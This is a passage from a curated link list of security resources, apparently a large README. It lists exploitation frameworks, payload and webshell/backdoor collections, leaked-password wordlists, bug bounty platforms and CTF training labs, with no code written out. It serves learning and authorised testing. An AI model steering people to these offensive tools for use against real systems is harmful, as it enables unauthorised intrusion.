href="https://github.com/woj-ciech/LeakLooker"><b>LeakLooker</b></a> - find open databases - powered by Binaryedge.io<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/offensive-security/exploitdb"><b>exploitdb</b></a> - searchable archive from The Exploit Database.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vulnersCom/getsploit"><b>getsploit</b></a> - is a command line utility for searching and downloading exploits.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/zardus/ctf-tools"><b>ctf-tools</b></a> - some setup scripts for security research tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Gallopsled/pwntools"><b>pwntools</b></a> - CTF framework and exploit development library.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bl4de/security-tools"><b>security-tools</b></a> - collection of small security tools created mostly in Python. CTFs, pentests and so on.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/leonteale/pentestpackage"><b>pentestpackage</b></a> - is a package of Pentest scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/dloss/python-pentest-tools"><b>python-pentest-tools</b></a> - python tools for penetration testers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/fuzzdb-project/fuzzdb"><b>fuzzdb</b></a> - dictionary of attack patterns and primitives for black-box application fault injection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/AFL"><b>AFL</b></a> - is a free software fuzzer maintained by Google.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/AFLplusplus/AFLplusplus"><b>AFL++</b></a> - is AFL with community patches.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/syzkaller"><b>syzkaller</b></a> - is an unsupervised, coverage-guided kernel fuzzer.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/pwndbg/pwndbg"><b>pwndbg</b></a> - exploit development and reverse engineering with GDB made easy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/longld/peda"><b>GDB PEDA</b></a> - Python Exploit Development Assistance for GDB.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hex-rays.com/products/ida/index.shtml"><b>IDA</b></a> - multi-processor disassembler and debugger useful for reverse engineering malware.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/radare/radare2"><b>radare2</b></a> - framework for reverse-engineering and analyzing binaries.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/threat9/routersploit"><b>routersploit</b></a> - exploitation framework for embedded devices.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/NationalSecurityAgency/ghidra"><b>Ghidra</b></a> - is a software reverse engineering (SRE) framework.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/salesforce/vulnreport"><b>Vulnreport</b></a> - open-source pentesting management and automation platform by Salesforce Product Security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sc0tfree/mentalist"><b>Mentalist</b></a> - is a graphical tool for custom wordlist generation.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/archerysec/archerysec"><b>archerysec</b></a> - vulnerability assessment and management helps to perform scans and manage vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/j3ssie/Osmedeus"><b>Osmedeus</b></a> - fully automated offensive security tool for reconnaissance and vulnerability scanning.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/beefproject/beef"><b>beef</b></a> - the browser exploitation framework project.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/NullArray/AutoSploit"><b>AutoSploit</b></a> - automated mass exploiter.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/TH3xACE/SUDO_KILLER"><b>SUDO_KILLER</b></a> - is a tool to identify and exploit sudo rules' misconfigurations and vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/VirusTotal/yara"><b>yara</b></a> - the pattern matching swiss knife.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/gentilkiwi/mimikatz"><b>mimikatz</b></a> - a little tool to play with Windows security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sherlock-project/sherlock"><b>sherlock</b></a> - hunt down social media accounts by username across social networks.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://owasp.org/www-project-threat-dragon/"><b>OWASP Threat Dragon</b></a> - is a tool used to create threat model diagrams and to record possible threats.<br> </p> ##### :black_small_square: Pentests bookmarks collection <p> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.pentest-standard.org/index.php/Main_Page"><b>PTES</b></a> - the penetration testing execution standard.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.amanhardikar.com/mindmaps/Practice.html"><b>Pentests MindMap</b></a> - amazing mind map with vulnerable apps and systems.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.amanhardikar.com/mindmaps/webapptest.html"><b>WebApps Security Tests MindMap</b></a> - incredible mind map for WebApps security tests.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://brutelogic.com.br/blog/"><b>Brute XSS</b></a> - master the art of Cross Site Scripting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://portswigger.net/web-security/cross-site-scripting/cheat-sheet"><b>XSS cheat sheet</b></a> - contains many vectors that can help you bypass WAFs and filters.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jivoi.github.io/2015/07/03/offensive-security-bookmarks/"><b>Offensive Security Bookmarks</b></a> - security bookmarks collection, all things that author need to pass OSCP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/coreb1t/awesome-pentest-cheat-sheets"><b>Awesome Pentest Cheat Sheets</b></a> - collection of the cheat sheets useful for pentesting.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Hack-with-Github/Awesome-Hacking"><b>Awesome Hacking by HackWithGithub</b></a> - awesome lists for hackers, pentesters and security researchers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/carpedm20/awesome-hacking"><b>Awesome Hacking by carpedm20</b></a> - a curated list of awesome hacking tutorials, tools and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vitalysim/Awesome-Hacking-Resources"><b>Awesome Hacking Resources</b></a> - collection of hacking/penetration testing resources to make you better.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/enaqx/awesome-pentest"><b>Awesome Pentest</b></a> - collection of awesome penetration testing resources, tools and other shiny things.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/m4ll0k/Awesome-Hacking-Tools"><b>Awesome-Hacking-Tools</b></a> - is a curated list of awesome Hacking Tools.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ksanchezcld/Hacking_Cheat_Sheet"><b>Hacking Cheat Sheet</b></a> - author hacking and pentesting notes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/toolswatch/blackhat-arsenal-tools"><b>blackhat-arsenal-tools</b></a> - official Black Hat arsenal security tools repository.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.peerlyst.com/posts/the-complete-list-of-infosec-related-cheat-sheets-claus-cramon"><b>Penetration Testing and WebApp Cheat Sheets</b></a> - the complete list of Infosec related cheat sheets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/The-Art-of-Hacking/h4cker"><b>Cyber Security Resources</b></a> - includes thousands of cybersecurity-related references and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/jhaddix/pentest-bookmarks"><b>Pentest Bookmarks</b></a> - there are a LOT of pentesting blogs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OlivierLaflamme/Cheatsheet-God"><b>Cheatsheet-God</b></a> - Penetration Testing Reference Bank - OSCP/PTP & PTX Cheatsheet.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Cyb3rWard0g/ThreatHunter-Playbook"><b>ThreatHunter-Playbook</b></a> - to aid the development of techniques and hypothesis for hunting campaigns.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/hmaverickadams/Beginner-Network-Pentesting"><b>Beginner-Network-Pentesting</b></a> - notes for beginner network pentesting course.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rewardone/OSCPRepo"><b>OSCPRepo</b></a> - is a list of resources that author have been gathering in preparation for the OSCP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/swisskyrepo/PayloadsAllTheThings"><b>PayloadsAllTheThings</b></a> - a list of useful payloads and bypass for Web Application Security and Pentest/CTF.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/foospidy/payloads"><b>payloads</b></a> - git all the Payloads! A collection of web attack payloads.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/payloadbox/command-injection-payload-list"><b>command-injection-payload-list</b></a> - command injection payload list.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/s0md3v/AwesomeXSS"><b>AwesomeXSS</b></a> - is a collection of Awesome XSS resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/JohnTroony/php-webshells"><b>php-webshells</b></a> - common php webshells.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/"><b>Pentesting Tools Cheat Sheet</b></a> - a quick reference high level overview for typical penetration testing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cheatsheetseries.owasp.org/"><b>OWASP Cheat Sheet Series</b></a> - is a collection of high value information on specific application security topics.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://jeremylong.github.io/DependencyCheck/index.html"><b>OWASP dependency-check</b></a> - is an open source solution the OWASP Top 10 2013 entry.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Proactive_Controls"><b>OWASP ProActive Controls</b></a> - OWASP Top 10 Proactive Controls 2018.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE"><b>PENTESTING-BIBLE</b></a> - hacking & penetration testing & red team & cyber security & computer science resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/nixawk/pentest-wiki"><b>pentest-wiki</b></a> - is a free online security knowledge library for pentesters/researchers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://media.defcon.org/"><b>DEF CON Media Server</b></a> - great stuff from DEFCON.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rshipp/awesome-malware-analysis"><b>Awesome Malware Analysis</b></a> - a curated list of awesome malware analysis tools and resources.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/"><b>SQL Injection Cheat Sheet</b></a> - detailed technical information about the many different variants of the SQL Injection.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://kb.entersoft.co.in/"><b>Entersoft Knowledge Base</b></a> - great and detailed reference about vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://html5sec.org/"><b>HTML5 Security Cheatsheet</b></a> - a collection of HTML5 related XSS attack vectors.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://evuln.com/tools/xss-encoder/"><b>XSS String Encoder</b></a> - for generating XSS code to check your input validation filters against XSS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://gtfobins.github.io/"><b>GTFOBins</b></a> - list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://guif.re/"><b>Guifre Ruiz Notes</b></a> - collection of security, system, network and pentest cheatsheets.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://blog.safebuff.com/2016/07/03/SSRF-Tips/index.html"><b>SSRF Tips</b></a> - a collection of SSRF Tips.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://shell-storm.org/repo/CTF/"><b>shell-storm repo CTF</b></a> - great archive of CTFs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bl4de/ctf"><b>ctf</b></a> - CTF (Capture The Flag) writeups, code snippets, notes, scripts.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/orangetw/My-CTF-Web-Challenges"><b>My-CTF-Web-Challenges</b></a> - collection of CTF Web challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/owasp-mstg"><b>MSTG</b></a> - The Mobile Security Testing Guide (MSTG) is a comprehensive manual for mobile app security testing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/sdcampbell/Internal-Pentest-Playbook"><b>Internal-Pentest-Playbook</b></a> - notes on the most common things for an Internal Network Penetration Test.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/streaak/keyhacks"><b>KeyHacks</b></a> - shows quick ways in which API keys leaked by a bug bounty program can be checked.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/securitum/research"><b>securitum/research</b></a> - various Proof of Concepts of security research performed by Securitum.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/juliocesarfort/public-pentesting-reports"><b>public-pentesting-reports</b></a> - is a list of public pentest reports released by several consulting security groups.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/djadmin/awesome-bug-bounty"><b>awesome-bug-bounty</b></a> - is a comprehensive curated list of available Bug Bounty.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/ngalongc/bug-bounty-reference"><b>bug-bounty-reference</b></a> - is a list of bug bounty write-ups.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/devanshbatham/Awesome-Bugbounty-Writeups"><b>Awesome-Bugbounty-Writeups</b></a> - is a curated list of bugbounty writeups.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pentester.land/list-of-bug-bounty-writeups.html"><b>Bug bounty writeups</b></a> - list of bug bounty writeups (2012-2020).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hackso.me/"><b>hackso.me</b></a> - a great journey into security.<br> </p> ##### :black_small_square: Backdoors/exploits <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bartblaze/PHP-backdoors"><b>PHP-backdoors</b></a> - a collection of PHP backdoors. For educational or testing purposes only.<br> </p> ##### :black_small_square: Wordlists and Weak passwords <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://weakpass.com/"><b>Weakpass</b></a> - for any kind of bruteforce find wordlists or unleash the power of them all at once!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hashes.org/"><b>Hashes.org</b></a> - is a free online hash resolving service incorporating many unparalleled techniques.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/danielmiessler/SecLists"><b>SecLists</b></a> - collection of multiple types of lists used during security assessments, collected in one place.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/berzerk0/Probable-Wordlists"><b>Probable-Wordlists</b></a> - sorted by probability originally created for password generation and testing.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.skullsecurity.org/index.php?title=Passwords"><b>skullsecurity passwords</b></a> - password dictionaries and leaked passwords repository.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://bezpieka.org/polski-slownik-premium-polish-wordlist"><b>Polish PREMIUM Dictionary</b></a> - official dictionary created by the team on the forum bezpieka.org.<b>*</b> <sup><a href="https://sourceforge.net/projects/kali-linux/files/Wordlist/">1</sup><br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/insidetrust/statistically-likely-usernames"><b>statistically-likely-usernames</b></a> - wordlists for creating statistically likely username lists.<br> </p> ##### :black_small_square: Bounty platforms <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.yeswehack.com/"><b>YesWeHack</b></a> - bug bounty platform with infosec jobs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.openbugbounty.org/"><b>Openbugbounty</b></a> - allows any security researcher reporting a vulnerability on any website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackerone.com/"><b>hackerone</b></a> - global hacker community to surface the most relevant security issues.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.bugcrowd.com/"><b>bugcrowd</b></a> - crowdsourced cybersecurity for the enterprise.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://crowdshield.com/"><b>Crowdshield</b></a> - crowdsourced security & bug bounty management.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.synack.com/"><b>Synack</b></a> - crowdsourced security & bug bounty programs, crowd security intelligence platform, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hacktrophy.com/en/"><b>Hacktrophy</b></a> - bug bounty platform.<br> </p> ##### :black_small_square: Web Training Apps (local installation) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Vulnerable_Web_Applications_Directory_Project"><b>OWASP-VWAD</b></a> - comprehensive and well maintained registry of all known vulnerable web applications.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.dvwa.co.uk/"><b>DVWA</b></a> - PHP/MySQL web application that is damn vulnerable.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://metasploit.help.rapid7.com/docs/metasploitable-2"><b>metasploitable2</b></a> - vulnerable web application amongst security researchers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rapid7/metasploitable3"><b>metasploitable3</b></a> - is a VM that is built from the ground up with a large amount of security vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/stamparm/DSVW"><b>DSVW</b></a> - is a deliberately vulnerable web application written in under 100 lines of code.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://sourceforge.net/projects/mutillidae/"><b>OWASP Mutillidae II</b></a> - free, open source, deliberately vulnerable web-application.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/OWASP_Juice_Shop_Project"><b>OWASP Juice Shop Project</b></a> - the most bug-free vulnerable application in existence.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.owasp.org/index.php/Projects/OWASP_Node_js_Goat_Project"><b>OWASP Node js Goat Project</b></a> - OWASP Top 10 security risks apply to web apps developed using Node.js.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/iteratec/juicy-ctf"><b>juicy-ctf</b></a> - run Capture the Flags and Security Trainings with OWASP Juice Shop.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/OWASP/SecurityShepherd"><b>SecurityShepherd</b></a> - web and mobile application security training platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/opendns/Security_Ninjas_AppSec_Training"><b>Security Ninjas</b></a> - open source application security training program.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rapid7/hackazon"><b>hackazon</b></a> - a modern vulnerable web app.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/appsecco/dvna"><b>dvna</b></a> - damn vulnerable NodeJS application.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/DefectDojo/django-DefectDojo"><b>django-DefectDojo</b></a> - is an open-source application vulnerability correlation and security orchestration tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://google-gruyere.appspot.com/"><b>Google Gruyere</b></a> - web application exploits and defenses.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/amolnaik4/bodhi"><b>Bodhi</b></a> - is a playground focused on learning the exploitation of client-side web vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://websploit.h4cker.org/"><b>Websploit</b></a> - single vm lab with the purpose of combining several vulnerable appliations in one environment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/vulhub/vulhub"><b>vulhub</b></a> - pre-built Vulnerable Environments based on docker-compose.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://rhinosecuritylabs.com/aws/introducing-cloudgoat-2/"><b>CloudGoat 2</b></a> - the new & improved "Vulnerable by Design" AWS deployment tool.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/globocom/secDevLabs"><b>secDevLabs</b></a> - is a laboratory for learning secure web development in a practical manner.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/incredibleindishell/CORS-vulnerable-Lab"><b>CORS-vulnerable-Lab</b></a> - sample vulnerable code and its exploit code.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/moloch--/RootTheBox"><b>RootTheBox</b></a> - a Game of Hackers (CTF Scoreboard & Game Manager).<br> </p> ##### :black_small_square: Labs (ethical hacking platforms/trainings/CTFs) <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.offensive-security.com/"><b>Offensive Security</b></a> - true performance-based penetration testing training for over a decade.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackthebox.eu/"><b>Hack The Box</b></a> - online platform allowing you to test your penetration testing skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hacking-lab.com/index.html"><b>Hacking-Lab</b></a> - online ethical hacking, computer network and security challenge platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://pwnable.kr/index.php"><b>pwnable.kr</b></a> - non-commercial wargame site which provides various pwn challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pwnable.tw/"><b>Pwnable.tw</b></a> - is a wargame site for hackers to test and expand their binary exploiting skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://picoctf.com/"><b>picoCTF</b></a> - is a free computer security game targeted at middle and high school students.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ctflearn.com/"><b>CTFlearn</b></a> - is an online platform built to help ethical hackers learn and practice their cybersecurity knowledge.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ctftime.org/"><b>ctftime</b></a> - CTF archive and a place, where you can get some another CTF-related info.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://silesiasecuritylab.com/"><b>Silesia Security Lab</b></a> - high quality security testing services.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://practicalpentestlabs.com/"><b>Practical Pentest Labs</b></a> - pentest lab, take your Hacking skills to the next level.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.root-me.org/?lang=en"><b>Root Me</b></a> - the fast, easy, and affordable way to train your hacking skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://rozwal.to/login"><b>rozwal.to</b></a> - a great platform to train your pentesting skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://tryhackme.com/"><b>TryHackMe</b></a> - learning Cyber Security made easy.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hackxor.net/"><b>hackxor</b></a> - is a realistic web application hacking game, designed to help players of all abilities develop their skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://hack-yourself-first.com/"><b>Hack Yourself First</b></a> - it's full of nasty app sec holes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://overthewire.org/wargames/"><b>OverTheWire</b></a> - can help you to learn and practice security concepts in the form of fun-filled games.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://labs.wizard-security.net/"><b>Wizard Labs</b></a> - is an online Penetration Testing Lab.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://pentesterlab.com/"><b>PentesterLab</b></a> - provides vulnerable systems that can be used to test and understand vulnerabilities.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ringzer0ctf.com/"><b>RingZer0</b></a> - tons of challenges designed to test and improve your hacking skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://www.try2hack.nl/"><b>try2hack</b></a> - several security-oriented challenges for your entertainment.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.ubeeri.com/preconfig-labs"><b>Ubeeri</b></a> - preconfigured lab environments.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://lab.pentestit.ru/"><b>Pentestit</b></a> - emulate IT infrastructures of real companies for legal pen testing and improving pentest skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://microcorruption.com/login"><b>Microcorruption</b></a> - reversal challenges done in the web interface.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://crackmes.one/"><b>Crackmes</b></a> - download crackmes to help improve your reverse engineering skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://domgo.at/cxss/intro"><b>DomGoat</b></a> - DOM XSS security learning and practicing platform.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://chall.stypr.com"><b>Stereotyped Challenges</b></a> - upgrade your web hacking techniques today!<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.vulnhub.com/"><b>Vulnhub</b></a> - allows anyone to gain practical 'hands-on' experience in digital security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://w3challs.com/"><b>W3Challs</b></a> - is a penetration testing training platform, which offers various computer challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ringzer0ctf.com/challenges"><b>RingZer0 CTF</b></a> - offers you tons of challenges designed to test and improve your hacking skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://hack.me/"><b>Hack.me</b></a> - a platform where you can build, host and share vulnerable web apps for educational purposes.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackthis.co.uk/levels/"><b>HackThis!</b></a> - discover how hacks, dumps and defacements are performed and secure your website.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.enigmagroup.org/#"><b>Enigma Group WebApp Training</b></a> - these challenges cover the exploits listed in the OWASP Top 10 Project.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://challenges.re/"><b>Reverse Engineering Challenges</b></a> - challenges, exercises, problems and tasks - by level, by type, and more.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://0x00sec.org/"><b>0x00sec</b></a> - the home of the Hacker - Malware, Reverse Engineering, and Computer Science.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.wechall.net/challs"><b>We Chall</b></a> - there are exist a lots of different challenge types.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackergateway.com/"><b>Hacker Gateway</b></a> - is the go-to place for hackers who want to test their skills.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hacker101.com/"><b>Hacker101</b></a> - is a free class for web security.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://contained.af/"><b>contained.af</b></a> - a stupid game for learning about containers, capabilities, and syscalls.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://flaws.cloud/"><b>flAWS challenge!</b></a> - a series of levels you'll learn about common mistakes and gotchas when using AWS.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cybersecurity.wtf"><b>CyberSec WTF</b></a> - provides web hacking challenges derived from bounty write-ups.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://ctfchallenge.co.uk/login"><b>CTF Challenge</b></a> - CTF Web App challenges.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://capturetheflag.withgoogle.com"><b>gCTF</b></a> - most of the challenges used in the Google CTF 2017.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.hackthissite.org/pages/index/index.php"><b>Hack This Site</b></a> - is a free, safe and legal training ground for hackers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://attackdefense.com"><b>Attack & Defense</b></a> - is a browser-based cloud labs.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cryptohack.org/"><b>Cryptohack</b></a> - a fun platform for learning modern cryptography.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://cryptopals.com/"><b>Cryptopals</b></a> - the cryptopals crypto challenges.<br> </p> ##### :black_small_square: CTF platforms <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/facebook/fbctf"><b>fbctf</b></a> - platform to host Capture the Flag competitions.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/google/ctfscoreboard"><b>ctfscoreboard</b></a> - scoreboard for Capture The Flag competitions.<br> </p> ##### :black_small_square: Other resources <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/bugcrowd/bugcrowd_university"><b>Bugcrowd University</b></a> - open source education content for the researcher community.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/rewardone/OSCPRepo"><b>OSCPRepo</b></a> - a list of resources and scripts that I have been gathering in preparation for the OSCP.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://medium.com/@cxosmo/owasp-top-10-real-world-examples-part-1-a540c4ea2df5"><b>OWASP Top 10: Real-World Examples</b></a> - test your web apps with real-world examples (two-part series).<br> &nbsp;&nbsp;:small_orange_diamond: <a href="http://phrack.org/index.html"><b>phrack.org</b></a> - an awesome collection of articles from several respected hackers and other thinkers.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://github.com/Gr1mmie/Practical-Ethical-Hacking-Resources"><b>Practical-Ethical-Hacking-Resources</b></a> - compilation of resources from TCM's Udemy Course.<br> </p> #### Your daily knowledge and news &nbsp;[<sup>[TOC]</sup>](#anger-table-of-contents) ##### :black_small_square: RSS Readers <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://feedly.com/"><b>Feedly</b></a> - organize, read and share what matters to you.<br> &nbsp;&nbsp;:small_orange_diamond: <a href="https://www.inoreader.com/"><b>Inoreader</b></a> - similar to feedly with a support for filtering what you fetch from rss.<br> </p> ##### :black_small_square: IRC Channels <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://wiki.hackerspaces.org/IRC_Channel"><b>#hackerspaces</b></a> - hackerspace IRC channels.<br> </p> ##### :black_small_square: Security <p> &nbsp;&nbsp;:small_orange_diamond: <a href="https://thehackernews.com/"><b>The Hacker News</b></a> - leading news source dedicated to promoting awareness for security experts and hackers.<br> 